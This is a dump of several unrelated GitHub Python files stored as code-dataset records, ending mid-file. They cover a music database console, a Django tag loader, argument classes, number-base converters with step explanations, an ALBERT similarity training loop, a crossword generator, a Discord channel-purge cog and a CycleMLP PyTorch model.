\n\nalbum_repository.delete_all()\nartist_repository.delete_all()\n\nartist1 = Artists(\"Oasis\")\nartist_repository.save(artist1)\nartist2 = Artists(\"Metallica\")\nartist_repository.save(artist2)\n\nalbum1 = Albums(\"Time Flies...1994-2009\",\"Rock\",\"Oasis\")\nalbum_repository.save(album1)\nalbum2 = Albums(\"Load\",\"Rock\",\"Metallica\")\nalbum_repository.save(album2)\n\nfound_artist = artist_repository.select(artist1.id)\nfound_album = album_repository.select(album1.id)\n\nselected_album = album_repository.select_all()\nselected_artist = 
artist_repository.select_all()\n\n\npdb.set_trace()","repo_name":"JordanMcK5/Week4_Music_DB_Lab","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20431835106","text":"import json\n\nfrom django.core.management.base import BaseCommand\nfrom recipes.models import Tag\n\n\nclass Command(BaseCommand):\n    help = 'Load tags from JSON file into database'\n\n    def handle(self, *args, **options):\n        with open(\n            'data/tags.json',\n            'r',\n            encoding='UTF-8'\n        ) as tags:\n            data = json.load(tags)\n            for note in data:\n                try:\n                    Tag.objects.get_or_create(**note)\n                    print(f'{note[\"name\"]} is in the database')\n                except Exception as error:\n                    print(f'Error while adding {note[\"name\"]}.\\n'\n                          f'Text - {error}')\n\n        print('Tag loading complete')\n","repo_name":"AlexandrSakulin/foodgram-project-react","sub_path":"backend/recipes/management/commands/load_tags.py","file_name":"load_tags.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17439664711","text":"\n\nfrom .common import *\n\n\nclass ArgumentTypes(object):\n    \n    _atlut = None\n    \n    def __init__(self, *initializer):\n        self._atlut = {}\n        for cls in initializer:\n            self.add(cls)\n    \n    def add(self, cls):\n        if not (isinstance(cls, type) and issubclass(cls, Argument)):\n            raise ValueError(\"Invalid type, expected a subclass of Argument\" \\\n                \" but found: {!s}\".format(cls))\n        name = cls.__name__\n        if name in self._atlut:\n            if self._atlut[name] is not cls:\n                raise ValueError(\"Duplicate Argument type {:s}\".format(name))\n            return\n        self._atlut[name] = cls\n\n\nclass Argument(object):\n    \n    @classmethod\n    def from_token(cls, whole, prefix=None, sep=None, suffix=None):\n        return cls(whole)\n    \n    _value = None\n    _type = None\n    \n    @property\n    def value(self):\n        return self._type(self._value) if self._type else self._value\n    \n    def __init__(self, value, astype=None):\n        if astype is None:\n            astype = type(value)\n        self._value = str(value)\n        self._type = astype\n    \n    def __str__(self):\n        return self._value\n\n\nclass KeyWordArgument(Argument):\n    \n    @classmethod\n    def from_token(cls, whole, prefix, sep, suffix):\n        if sep not in \":=\":\n            raise ValueError('invalid {:s} token: {:s}'.format(cls.__name__, whole))\n        return cls(prefix, suffix)\n    \n    _keyword = None\n    \n    def key(self):\n        return self._keyword\n    \n    def __init__(self, key, value):\n        if not key or not type(key) is str:\n            raise ValueError('key must be a string but found {!s}'.format(key))\n        self._keyword = key\n        super().__init__(value or None)\n\n\nclass OptionArgument(KeyWordArgument):\n    \n    @classmethod\n    def from_token(cls, whole, prefix, sep, suffix):\n        if sep not in \":=\":\n            raise ValueError('invalid {:s} token: {:s}'.format(cls.__name__, whole))\n        return cls(prefix, sep, suffix)\n    \n    _operator = None\n    \n    def __init__(self, key, operator, value):\n        if operator and not type(operator) is str:\n            raise ValueError('operator must be a string but found {!s}' \\\n                .format(operator))\n        self._operator = operator or None\n        super().__init__(key, value)\n    \n\n\nclass CommandArgument(OptionArgument):\n    \n    pass\n\n\n\n","repo_name":"ismaelharunid/argyle","sub_path":"pyimp/argyle/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9096818012","text":"def convertBinToOct(num):\n    # 
print the steps to convert bin to oct\n    # Convert every 3 binary digits (from bit0) to octal digit (see conversion table below):\n    dict = {'000': '0', '001': '1', '010': '2', '011': '3',\n            '100': '4', '101': '5', '110': '6', '111': '7'}\n    num = str(num)\n    if len(num) % 3 == 1:\n        num = '00' + num\n    elif len(num) % 3 == 2:\n        num = '0' + num\n    num = num[::-1]\n    group = []\n    for i in range(0, len(num), 3):\n        group.append(num[i:i+3])\n    group = group[::-1]\n    # reverse each string in group\n    for i in range(len(group)):\n        group[i] = group[i][::-1]\n\n    explain = []\n    res = ''\n    for i in group:\n        res += dict[i]\n        explain.append(f'{i} = {dict[i]}')\n    return ' | '.join(explain), res\n\n\ndef convertBinToDec(num):\n    # print the steps to convert bin to dec\n    # The decimal number is equal to the sum of binary digits (dn) times their power of 2 (2n):\n    num = str(num)\n    length = len(num)\n    res = 0\n    explain = []\n    for i in range(length):\n        explain.append(f'{num[i]}*2^{length-i-1}')\n        res += int(num[i]) * 2**(length-i-1)\n\n    return (' + '.join(explain))\n\n\ndef convertBinToHex(num):\n    # print the steps to convert bin to hex\n    # Convert every 4 binary digits (from bit0) to hexadecimal digit (see conversion table below):\n    dict = {'0000': '0', '0001': '1', '0010': '2', '0011': '3',\n            '0100': '4', '0101': '5', '0110': '6', '0111': '7',\n            '1000': '8', '1001': '9', '1010': 'A', '1011': 'B',\n            '1100': 'C', '1101': 'D', '1110': 'E', '1111': 'F'}\n    num = str(num)\n    if len(num) % 4 == 1:\n        num = '000' + num\n    elif len(num) % 4 == 2:\n        num = '00' + num\n    elif len(num) % 4 == 3:\n        num = '0' + num\n    num = num[::-1]\n    group = []\n    for i in range(0, len(num), 4):\n        group.append(num[i:i+4])\n    group = group[::-1]\n    # reverse each string in group\n    for i in range(len(group)):\n        group[i] = group[i][::-1]\n\n    explain = []\n    res = ''\n    for i in group:\n        res += dict[i]\n        explain.append(f'{i} = {dict[i]}')\n\n    return ' | '.join(explain), res\n\n\ndef convertOctToBin(num):\n    # print the steps to convert oct to bin\n    # Convert every octal digit to binary (see conversion table below):\n    dict = {'0': '000', '1': '001', '2': '010', '3': '011',\n            '4': '100', '5': '101', '6': '110', '7': '111'}\n    num = str(num)\n    res = ''\n    explain = []\n    for i in num:\n        res += dict[i]\n        explain.append(f'{i} = {dict[i]}')\n    return ' | '.join(explain), res\n\n\ndef convertOctToDec(num):\n    # print the steps to convert oct to dec\n    # The decimal number is equal to the sum of octal digits (dn) times their power of 8 (8n):\n    num = str(num)\n    length = len(num)\n    res = 0\n    explain = []\n    for i in range(length):\n        explain.append(f'{num[i]}*8^{length-i-1}')\n        res += int(num[i]) * 8**(length-i-1)\n    return ' + '.join(explain)\n\n\ndef convertOctToHex(num):\n    # print the steps to convert oct to hex\n    # Convert octal to binary, then binary to hexadecimal:\n    explain, res = convertOctToBin(num)\n\n    explain2, res = convertBinToHex(res)\n    return explain, explain2, res\n\n\ndef convertDecToBin(num):\n    num = int(num)\n    res = ''\n    explain = []\n\n    bit = 0\n    while num != 0:\n        res += str(num % 2)\n        explain.append(\n            f'{num:8} / 2 {(num//2):8} {(num % 2):6} {bit:3}')\n        num = num // 2\n        bit += 1\n    return \"Division by 2 Quotient Remainder Bit #\\n\" + '\\n'.join(explain), res[::-1]\n\n\ndef convertDecToOct(num):\n    # print the steps to convert dec to oct\n    # Divide the number by 8 until you get a quotient of 0.\n    # The remainders are the octal digits in reverse order.\n    num = int(num)\n    res = ''\n    explain = []\n\n    bit = 0\n    while num != 0:\n        res += str(num % 8)\n        explain.append(\n            f'{num:8} 
/ 8 {(num//8):8} {(num % 8):6} {bit:3}')\n        num = num // 8\n        bit += 1\n    return \"Division by 8 Quotient Remainder Bit #\\n\" + '\\n'.join(explain)\n\n\ndef convertDecToHex(num):\n    num = int(num)\n    res = ''\n    explain = []\n    dict = {10: 'A', 11: 'B', 12: 'C', 13: 'D', 14: 'E', 15: 'F'}\n    bit = 0\n    while num != 0:\n        if num % 16 >= 10:\n            res += dict[num % 16]\n        else:\n            res += str(num % 16)\n        explain.append(\n            f'{num:8} / 16 {(num//16):8} {(num % 16):6} {bit:3}')\n        num = num // 16\n        bit += 1\n    return \"Division by 16 Quotient Remainder Bit #\\n\" + '\\n'.join(explain)\n\n\n\ndef convertHexToBin(num):\n    # print the steps to convert hex to bin\n    # Convert every hexadecimal digit to binary (see conversion table below):\n    dict = {'0': '0000', '1': '0001', '2': '0010', '3': '0011',\n            '4': '0100', '5': '0101', '6': '0110', '7': '0111',\n            '8': '1000', '9': '1001', 'A': '1010', 'B': '1011',\n            'C': '1100', 'D': '1101', 'E': '1110', 'F': '1111'}\n    num = str(num)\n    temp = ''\n    explain = []\n    for i in num:\n        temp += dict[i]\n        explain.append(f'{i} = {dict[i]}')\n    res = []\n    for i in range(0, len(temp), 4):\n        res.append(temp[i:i+4])\n\n    return ' | '.join(explain), ' '.join(res)\n\n\n\ndef convertHexToOct(num):\n    # print the steps to convert hex to oct\n    # Convert hexadecimal to binary, then binary to octal:\n    # print(\"Convert hexadecimal to binary, then binary to octal:\")\n    explain, res = convertHexToBin(num)\n    res = ''.join(res.split(' '))\n    explain2, res = convertBinToOct(res)\n    return explain, explain2\n\n\n\ndef convertHexToDec(num):\n    # print the steps to convert hex to dec\n    # The decimal number is equal to the sum of hexadecimal digits (dn) times their power of 16 (16n):\n    num = str(num)\n    length = len(num)\n    res = 0\n    explain = []\n    dict = {'A': 10, 'B': 11, 'C': 12, 'D': 13, 'E': 14, 'F': 15}\n    for i in range(length):\n        if num[i] in dict:\n            res += dict[num[i]] * 16**(length-i-1)\n            explain.append(f'{dict[num[i]]}*16^{length-i-1}')\n        else:\n            res += int(num[i]) * 16**(length-i-1)\n            explain.append(f'{num[i]}*16^{length-i-1}')\n\n    return ' + '.join(explain)","repo_name":"Rohit-2412/Number-System-Convertor","sub_path":"conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"34055046962","text":"import sys\nimport os\nfrom transformers import optimization\n\nrootPath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(rootPath)\n\nimport torch\nfrom torch import nn\nimport pandas as pd\nfrom data_process import *\nfrom similarity import *\n\n\n# train the model\ndef train():\n    model = albert_similarity_model()\n\n    train, test_token,test_mask,test_seg_ment, eval_y = load_data()\n\n    eval_token = torch.tensor(test_token)\n    eval_mask = torch.tensor(test_mask)\n    eval_seg_ment = torch.tensor(test_seg_ment)\n    if torch.cuda.is_available():\n        model = model.cuda()\n        eval_token = eval_token.cuda()\n        eval_mask = eval_mask.cuda()\n        eval_seg_ment = eval_seg_ment.cuda()\n\n    optimizer = optimization.AdamW(model.parameters(), lr=1e-3)\n    loss_func = nn.BCELoss()\n\n    best_acc = 0\n\n    for epoch in range(8):\n        for step, ((token,mask,seg_ment),label) in enumerate(train):\n            if torch.cuda.is_available():\n                token = torch.tensor(token).cuda()\n                mask = torch.tensor(mask).cuda()\n                seg_ment = torch.tensor(seg_ment).cuda()\n                label = torch.tensor(label).cuda()\n            output = model(token,mask,seg_ment)\n            loss = loss_func(output, label.float())\n            optimizer.zero_grad()\n            loss.backward()\n            
optimizer.step()\n\n            if step % 20 == 0:\n                test_output = model(eval_token,eval_mask,eval_seg_ment)\n                pred_y = (test_output.cpu().data.numpy() > 0.5).astype(int)\n                accuracy = float((pred_y == eval_y).astype(int).sum()) / float(eval_y.size)\n                if accuracy > best_acc:\n                    best_acc = accuracy\n                    torch.save(model.state_dict(), 'model_s.pth')\n                    print('save model, accuracy: %.3f' % accuracy)\n                print('Epoch: ', epoch, '| train loss: %.4f' % loss.cpu().data.numpy(),\n                      '| test accuracy: %.3f' % accuracy)\n\n\nif __name__ == '__main__':\n    train()","repo_name":"Suiyiaixiaoyu/QAMaster","sub_path":"albert_similarity/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"39360975115","text":"import numpy as np\nimport copy\nimport json\nimport jsonpickle\n\n\n# 1st heuristic: rectangle as small as possible -> graph: this is where it gets difficult\n# 2nd heuristic: as many overlaps as possible -> graph: number of nodes\n\n\nclass Position:\n    __row: int\n    __col: int\n\n    def __init__(self, row: int = -1, col: int = -1):\n        self.__row = row\n        self.__col = col\n\n    def get_row(self):\n        return self.__row\n\n    def get_col(self):\n        return self.__col\n\n    def set_row(self, row):\n        self.__row = row\n\n    def set_col(self, col):\n        self.__col = col\n\n\nclass Board:\n    __size: int\n    grid: np.chararray\n\n    def __init__(self, size: int):\n        self.__size = size\n        self.__create_grid()\n\n    def __create_grid(self):\n        self.grid = np.chararray((self.__size, self.__size), unicode=True)\n\n    def print_board(self):\n        for row in self.grid:\n            print(row)\n\n    def get_size(self):\n        return self.__size\n\n    def put(self, x, y, char):\n        pass\n\n\nclass CandidatePlacement:\n    __word: str\n    __position: Position\n    __direction: str\n    __hits: list\n\n    def __init__(self, word: str = \"\", position: Position = Position(), direction: str = \"\", hits = []):\n        self.__word = word\n        self.__position = position\n        self.__direction = direction\n        self.__hits = hits\n\n    def get_word(self):\n        return self.__word\n\n    def set_word(self, new_word: str):\n        self.__word = new_word\n\n    def get_position(self):\n        return self.__position\n\n    def set_position(self, pos: Position):\n        self.__position = pos\n\n    def get_direction(self):\n        return self.__direction\n\n    def set_direction(self, direction: str):\n        self.__direction = direction\n\n    def get_hits(self):\n        return self.__hits\n\n    def set_hits(self, hits: []):\n        self.__hits = hits\n\n\nclass CrosswordGenerator:\n    __board: Board\n    __word_list: []\n    __tracker = {}\n\n    def __init__(self, board: Board, word_list: []):\n        # option: shuffle randomly\n        self.__board = board\n        self.__word_list = word_list\n        self.__set_start_word_position(word_list[0])\n\n    @staticmethod\n    def __pretty_print(obj):\n        serialized = jsonpickle.encode(obj)\n        print(json.dumps(json.loads(serialized), indent=2))\n\n    def __set_start_word_position(self, first_word: str):\n        col = (self.__board.get_size() - len(first_word)) // 2\n        row = self.__board.get_size() // 2\n        # self.__tracker[first_word] = (Position(row, col), \"right\")\n        self.__tracker[first_word] = CandidatePlacement(word=first_word, position=Position(row, col), direction=\"right\")\n\n        for char in first_word:\n            self.__board.grid[row][col] = char\n            col = col + 1\n\n        self.generate_crossword()\n\n    def generate_crossword(self):\n        for word_index in range(len(listOfWords) - 1):\n            options_dict = self.__find_options(listOfWords[word_index + 1])\n            # print(len(options_list))\n            for (new_word, 
candidate_placement) in options_dict.items():\n                for letter in candidate_placement.get_hits():\n                    self.__validate_option(new_word, candidate_placement, letter)\n\n    # new object:\n    # Dict{ key = new_word,\n    #       value = {\n    #           old_word,\n    #           old_position,\n    #           old_direction,\n    #           list[] hits\n    #           }\n\n    def __find_options(self, new_word: str):\n        result = {}\n\n        for set_word in self.__tracker.keys():\n            letter_list = list(set_word)\n            for letter_index in range(len(letter_list)):\n                for char in list(new_word):\n                    if char == letter_list[letter_index]:\n                        if new_word in result:\n                            result[new_word].get_hits().append(letter_list[letter_index])\n                        else:\n                            old_word = copy.deepcopy(self.__tracker.get(set_word))\n                            candidate_placement = CandidatePlacement(set_word, old_word.get_position(), \"\", [])\n                            if old_word.get_direction() == \"right\":\n                                old_word.get_position().set_col(old_word.get_position().get_col() + letter_index)\n                            else:\n                                old_word.get_position().set_row(old_word.get_position().get_row() + letter_index)\n                            candidate_placement.set_direction(old_word.get_direction())\n                            candidate_placement.get_hits().append(letter_list[letter_index])\n                            result[new_word] = candidate_placement\n\n        for (k, v) in result.items():\n            CrosswordGenerator.__pretty_print(k)\n            CrosswordGenerator.__pretty_print(v)\n        return result\n\n    def __validate_option(self, new_word: str, candidate: CandidatePlacement, letter: str):\n        # TODO: duplicate letters ?!\n\n        prefix: int = new_word.index(letter)  # length of the subword BEFORE the colliding letter\n        suffix: int = len(new_word) - new_word.index(letter) - 1  # length of the subword AFTER the colliding letter\n        print(\"prefix: \", prefix)\n        print(\"suffix: \", suffix)\n\n        # case 1: the new word would run off the board\n        if candidate.get_direction() == \"right\":  # checks the direction of the \"old\" word; here the new word is oriented down\n            if (candidate.get_position().get_row() + suffix) > self.__board.get_size() - 1 or (\n                    candidate.get_position().get_row() - prefix) < 0:\n                print(\"Out of board! RIGHT Row: \", candidate.get_position().get_row() - prefix, \" Column: \", candidate.get_position().get_col() - suffix)\n                return False\n            new_word_placement = CandidatePlacement(\n                new_word,\n                Position(candidate.get_position().get_row() - prefix, candidate.get_position().get_col()),\n                \"down\", [])\n\n        elif candidate.get_direction() == \"down\":\n            if (candidate.get_position().get_col() - suffix) > self.__board.get_size() - 1 or (\n                    candidate.get_position().get_col() - prefix) < 0:\n                print(\"Out of board! 
DOWN Row: \" + str(candidate.get_position().get_row()) + \" Column: \" + str(candidate.get_position().get_col()))\n                return False\n            new_word_placement = CandidatePlacement(\n                new_word,\n                Position(candidate.get_position().get_col() - prefix, candidate.get_position().get_row()),\n                \"right\", [])\n\n        CrosswordGenerator.__pretty_print(new_word_placement)\n\n        # self.__board.print_board()\n\n        # cases 2 & 3: the new word overlaps an existing word or is \"too close\" to another word\n        if new_word_placement.get_direction() == \"down\":\n            letter_position = new_word_placement.get_position()  # 1, 2\n            # checks whether a letter already sits \"before\" or \"after\" the first and last letter of the\n            # word being placed (depending on writing direction) TODO: untested\n            if new_word_placement.get_position().get_row() - 1 >= 0:\n                if self.__board.grid[new_word_placement.get_position().get_row() - 1][new_word_placement.get_position().get_col()] != \"\":\n                    print(\"Aborting, out of board: vertical at the start\")\n                    return False\n\n            if new_word_placement.get_position().get_row() + len(new_word) <= self.__board.get_size():\n                if self.__board.grid[new_word_placement.get_position().get_row() + len(new_word_placement.get_word()) - 1][new_word_placement.get_position().get_col()] != \"\":\n                    print(\"Aborting, out of board: vertical at the end\")\n                    return False\n\n            # checks every letter of the word being placed orthogonally to the writing direction\n            for i in range(len(new_word_placement.get_word())):\n                # case: the correct letter is already at the position being examined\n                if new_word_placement.get_word()[i] == self.__board.grid[letter_position.get_row()][letter_position.get_col()]:\n                    letter_position.set_row(letter_position.get_row() + 1)  # look at the next letter, but signal via print that there was an intersection here\n                    print(\"Duckduck\")\n                    continue\n                # case: a different letter is at the position being examined\n                elif self.__board.grid[letter_position.get_row()][letter_position.get_col()] != \"\":\n                    print(\"Overlap with an already placed word\")\n                    return False\n                # else: the cell is still empty\n\n                # check the neighboring cells of the letter being examined\n                if \\\n                        letter_position.get_col() + 1 > self.__board.get_size() \\\n                        or letter_position.get_col() - 1 < 0 \\\n                        or self.__board.grid[letter_position.get_row()][letter_position.get_col() + 1] != \"\" \\\n                        or self.__board.grid[letter_position.get_row()][letter_position.get_col() - 1] != \"\":\n                    print(\"Words too close! 
\")\n break\n\n # Zeile von letter_position um 1 vergrößern (da wir im \"down\"-Fall sind)\n letter_position.set_row(letter_position.get_row() + 1)\n\n # TODO: ungetestet\n elif new_word_placement.get_direction() == \"right\":\n letter_position = new_word_placement.get_position() # 1, 2\n # überprüft den ersten und letzten Buchstaben des zu setzenden Wortes, ob \"davor\" oder \"danach\" schon ein\n # Buchstabe steht (je nach Schreibrichtung) TODO: ungetestet\n if new_word_placement.get_position().get_col() - 1 > 0:\n if self.__board.grid[new_word_placement.get_position().get_row()][new_word_placement.get_position().get_col() - 1] != \"\":\n print(\"Abbruch wegen out of Board 3\")\n return False\n\n if new_word_placement.get_position().get_col() + 1 < self.__board.get_size():\n if self.__board.grid[new_word_placement.get_position().get_row()][new_word_placement.get_position().get_col() + len(new_word_placement.get_word())] != \"\":\n print(\"Abbruch wegen out of Board 4\")\n return False\n\n # überprüft alle Buchstaben zu setzenden Wort orthogonal zur Schreibrichtung\n for i in range(len(new_word_placement.get_word())):\n # CrosswordGenerator.__pretty_print(letter_position)\n if new_word_placement.get_word()[i] == self.__board.grid[letter_position.get_row()][\n letter_position.get_col()]:\n letter_position.set_row(letter_position.get_col() + 1)\n print(\"Duckduck\")\n continue\n elif self.__board.grid[letter_position.get_row()][letter_position.get_col()] != \"\":\n print(\"Überschneidung mit schon gesetztem Wort vorhanden\")\n return False\n if \\\n letter_position.get_row() + 1 > self.__board.get_size() \\\n or letter_position.get_row() - 1 < 0 \\\n or self.__board.grid[letter_position.get_row() + 1][letter_position.get_col()] != \"\" \\\n or self.__board.grid[letter_position.get_row() - 1][letter_position.get_col()] != \"\":\n print(\"Words too close! 
\")\n break\n\n # Zeile von letter_position um 1 vergrößern (da wir im \"down\"-Fall sind)\n letter_position.set_row(letter_position.get_col() + 1)\n\n\nif __name__ == '__main__':\n listOfWords = [\"amulett\", \"zebra\"]\n listOfWords2 = [\"amulett\", \"zebra\", \"filter\", \"hymen\", \"rudern\", \"burger\", \"karosserie\", \"dinge\", \"hilfe\",\n \"vermuten\"]\n\n ducky = Board(7)\n duckys_brother = CrosswordGenerator(ducky, listOfWords)\n # ducky.print_board()\n","repo_name":"PondOfDuck/crossword_generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17814102063","text":"import logging\nimport discord\nfrom discord.ext import commands\nimport helpers\n\n\nclass PurgeChannel(commands.Cog):\n def __init__(self, bot: commands.Bot, config: helpers.Config, log: logging.Logger):\n self.bot = bot\n self.config = config\n self.log = log\n self.log.info(\"Loaded Cog PurgeChannel\")\n\n @commands.command()\n async def purge_channel(self, ctx: commands.Context, channel_alias: str):\n for channel in self.config.purge_channel:\n if ctx.channel.id == channel[\"command_channel_id\"] and channel_alias == channel[\"purge_channel_alias\"]:\n # Get the channel to purge\n discord_channel: discord.TextChannel\n discord_channel = discord.utils.get(self.bot.get_all_channels(), id=channel[\"purge_channel_id\"])\n # Used to check that the message isn't protected\n delete_allowed = lambda message: message.id not in channel[\"purge_ignore_messages\"]\n # Purge the messages that aren't protected\n deleted_messages = await discord_channel.purge(check=delete_allowed)\n helpers.log_message_deletes(deleted_messages, f\"ChannelPurge {channel_alias}\", self.log)\n if deleted_messages:\n await ctx.send(f\"Done! 
Deleted {len(deleted_messages)} {'message' if len(deleted_messages) == 1 else 'messages'}\")\n","repo_name":"zusorio/Echo2","sub_path":"cogs/purge_channel.py","file_name":"purge_channel.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39114334330","text":"\"\"\" \nPyTorch implementation of CycleMLP: A MLP-like Architecture for Dense Prediction\n\nAs described in https://arxiv.org/abs/2107.10224\n\nCycleMLP is built upon the Cycle Fully-Connected Layer (Cycle FC), which is capable \nof dealing with variable input scales and can serve as a generic, plug-and-play replacement \nof vanilla FC layers.\n\"\"\"\n\n\n\n\n\nimport os\nimport torch\nimport torch.nn as nn\n\n\n\nimport math\nfrom torch import Tensor\nfrom torch.nn import init\nfrom torch.nn.modules.utils import _pair\nfrom torchvision.ops.deform_conv import deform_conv2d as deform_conv2d_tv\n\n\nclass Mlp(nn.Module):\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass CycleFC(nn.Module):\n \"\"\"\n \"\"\"\n\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n kernel_size, # re-defined kernel_size, represent the spatial area of staircase FC\n stride: int = 1,\n padding: int = 0,\n dilation: int = 1,\n groups: int = 1,\n bias: bool = True,\n ):\n super(CycleFC, self).__init__()\n\n if in_channels % groups != 0:\n raise ValueError('in_channels must be divisible by groups')\n if out_channels % groups != 0:\n raise ValueError('out_channels must be divisible by groups')\n if stride != 1:\n raise ValueError('stride must be 1')\n if padding != 0:\n raise ValueError('padding must be 0')\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.stride = _pair(stride)\n self.padding = _pair(padding)\n self.dilation = _pair(dilation)\n self.groups = groups\n\n self.weight = nn.Parameter(torch.empty(out_channels, in_channels // groups, 1, 1)) # kernel size == 1\n\n if bias:\n self.bias = nn.Parameter(torch.empty(out_channels))\n else:\n self.register_parameter('bias', None)\n self.register_buffer('offset', self.gen_offset())\n\n self.reset_parameters()\n\n def reset_parameters(self) -> None:\n init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n\n if self.bias is not None:\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n init.uniform_(self.bias, -bound, bound)\n\n def gen_offset(self):\n \"\"\"\n offset (Tensor[batch_size, 2 * offset_groups * kernel_height * kernel_width,\n out_height, out_width]): offsets to be applied for each position in the\n convolution kernel.\n \"\"\"\n offset = torch.empty(1, self.in_channels*2, 1, 1)\n start_idx = (self.kernel_size[0] * self.kernel_size[1]) // 2\n assert self.kernel_size[0] == 1 or self.kernel_size[1] == 1, self.kernel_size\n for i in range(self.in_channels):\n if self.kernel_size[0] == 1:\n offset[0, 2 * i + 0, 0, 0] = 0\n offset[0, 2 * i + 1, 0, 0] = (i + start_idx) % self.kernel_size[1] - (self.kernel_size[1] // 2)\n 
else:\n offset[0, 2 * i + 0, 0, 0] = (i + start_idx) % self.kernel_size[0] - (self.kernel_size[0] // 2)\n offset[0, 2 * i + 1, 0, 0] = 0\n return offset\n\n def forward(self, input: Tensor) -> Tensor:\n \"\"\"\n Args:\n input (Tensor[batch_size, in_channels, in_height, in_width]): input tensor\n \"\"\"\n B, C, H, W = input.size()\n return deform_conv2d_tv(input, self.offset.expand(B, -1, H, W), self.weight, self.bias, stride=self.stride,\n padding=self.padding, dilation=self.dilation)\n\n def extra_repr(self) -> str:\n s = self.__class__.__name__ + '('\n s += '{in_channels}'\n s += ', {out_channels}'\n s += ', kernel_size={kernel_size}'\n s += ', stride={stride}'\n s += ', padding={padding}' if self.padding != (0, 0) else ''\n s += ', dilation={dilation}' if self.dilation != (1, 1) else ''\n s += ', groups={groups}' if self.groups != 1 else ''\n s += ', bias=False' if self.bias is None else ''\n s += ')'\n return s.format(**self.__dict__)\n\n\nclass CycleMLP(nn.Module):\n def __init__(self, dim, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0.):\n super().__init__()\n self.mlp_c = nn.Linear(dim, dim, bias=qkv_bias)\n\n self.sfc_h = CycleFC(dim, dim, (1, 3), 1, 0)\n self.sfc_w = CycleFC(dim, dim, (3, 1), 1, 0)\n\n self.reweight = Mlp(dim, dim // 4, dim * 3)\n\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def forward(self, x):\n B, H, W, C = x.shape\n h = self.sfc_h(x.permute(0, 3, 1, 2)).permute(0, 2, 3, 1)\n w = self.sfc_w(x.permute(0, 3, 1, 2)).permute(0, 2, 3, 1)\n c = self.mlp_c(x)\n\n a = (h + w + c).permute(0, 3, 1, 2).flatten(2).mean(2)\n a = self.reweight(a).reshape(B, C, 3).permute(2, 0, 1).softmax(dim=0).unsqueeze(2).unsqueeze(2)\n\n x = h * a[0] + w * a[1] + c * a[2]\n\n x = self.proj(x)\n x = self.proj_drop(x)\n\n return x\n\n\nclass CycleBlock(nn.Module):\n\n def __init__(self, dim, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop=0., attn_drop=0.,\n act_layer=nn.GELU, norm_layer=nn.LayerNorm, skip_lam=1.0, mlp_fn=CycleMLP):\n super().__init__()\n self.norm1 = norm_layer(dim)\n self.attn = mlp_fn(dim, qkv_bias=qkv_bias, qk_scale=None, attn_drop=attn_drop)\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer)\n self.skip_lam = skip_lam\n\n def forward(self, x):\n x = x + self.attn(self.norm1(x)) / self.skip_lam\n x = x + self.mlp(self.norm2(x)) / self.skip_lam\n return x\n\n\nclass PatchEmbedOverlapping(nn.Module):\n \"\"\" 2D Image to Patch Embedding with overlapping\n \"\"\"\n def __init__(self, patch_size=16, stride=16, padding=0, in_chans=3, embed_dim=768, norm_layer=None, groups=1):\n super().__init__()\n self.patch_size = patch_size\n # remove image_size in model init to support dynamic image size\n\n self.proj = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride, padding=padding, groups=groups)\n self.norm = norm_layer(embed_dim) if norm_layer else nn.Identity()\n\n def forward(self, x):\n x = self.proj(x)\n return x\n\n\nclass Downsample(nn.Module):\n \"\"\" Downsample transition stage\n \"\"\"\n def __init__(self, in_embed_dim, out_embed_dim, patch_size):\n super().__init__()\n assert patch_size == 2, patch_size\n self.proj = nn.Conv2d(in_embed_dim, out_embed_dim, kernel_size=(3, 3), stride=(2, 2), padding=1)\n\n def forward(self, x):\n x = x.permute(0, 3, 1, 2)\n x = self.proj(x) # B, C, H, W\n x = x.permute(0, 2, 3, 1)\n return x\n\n\ndef basic_blocks(dim, index, layers, mlp_ratio=3., qkv_bias=False, 
